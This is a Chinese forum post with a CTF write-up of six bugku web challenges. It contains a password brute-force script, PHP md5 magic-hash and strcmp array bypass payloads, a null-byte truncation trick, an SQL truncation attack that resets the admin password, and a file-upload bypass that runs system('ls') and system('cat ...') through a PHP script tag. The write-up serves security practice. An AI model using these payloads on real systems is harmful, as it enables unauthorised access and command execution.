[Writeup] bugku ctf web题 wp2

[复制链接]
查看12244 | 回复1 | 2017-5-28 11:50:20 | 显示全部楼层 |阅读模式
1.输入密码查看flag
简单看了一下不多想直接爆破了 上脚本:
# -*- coding: utf-8 -*-
#__auther__='daybreak"
import string
import requests

payload = '1234567890'

url='http://c.bugku.com/baopo/'

s = requests.session()

r = s.get(url)

for a in payload:
    for b in payload:
        for c in payload:
            for d in payload:
                for e in payload:
                    data={'pwd':a+b+c+d+e}
                    print data
                    r = s.post(url,data=data)
                    if "密码不正确,请重新输入" not in r.content:
                        print (r.content)
                        break


2.前女友
查看源码:
<?phpif(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){    $v1 = $_GET['v1'];    $v2 = $_GET['v2'];    $v3 = $_GET['v3'];    if($v1 != $v2 && md5($v1) == md5($v2)){        if(!strcmp($v3, $flag)){            echo $flag;        }    }}?>
是道代码审计的提,利用md5 0e漏洞  和strcmp漏洞直接绕过。
payload:v1=s878926199a&v2=s155964671a&v3[]=1


3.never give  up(骚套路的出题人)
点卡源码发现提示1p.html于是访问,结果发现跳到了bugku论坛,感觉有问题于是查看请求发现有个302请求好吧    burp抓包go一下看到了
直接解码得到了源码,有源码就方便了,直接代码审计payload:
id==0弱类型比较
strlen函数对%00不截断但substr截断
payload:http://120.24.86.145:8006/test/h ... put&b=%00111111
data:bugku is a nice plateform!

4.welcome to bugkuctf

查看源码代码审计:
payload:

30%%{6RRS~X@ER)B1W$OG[K.png
看到了hint.php
于是尝试构造pylaod去读取flag.php发现不成功。最后看源码发现可以序列化绕过于是构造payload:
KWEBX[T_1F7O}BO4HH58L.png


5.login1
注入题,说是sql约束攻击,进去一看是个登录界面,发现可以注册,果断抓包强行修改admin的密码,因为mysql数据库当数据在超过一定长度的时候会自动截断。于是如下图成功修改密码,用admin和修改的密码登录getflag
login11.png login12.png

6.文件包含2
说是文件包含。直接文本写入一段php代码修改成jpg格式上传,发现<?被转移了,使用js标签插入。文件内容如下:
<script language=php>system("ls")</script>
可以看到页面显示出现了一个flag的txt文件随后上传文件读取flag。文件内容如下:

<script language=php>system("cat 文件名.txt")</script>
因为本人水平有限  login2,3,4还在研究中。。

Created by daybreak

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

9

主题

21

帖子

74

积分

版主

Rank: 7Rank: 7Rank: 7

积分
74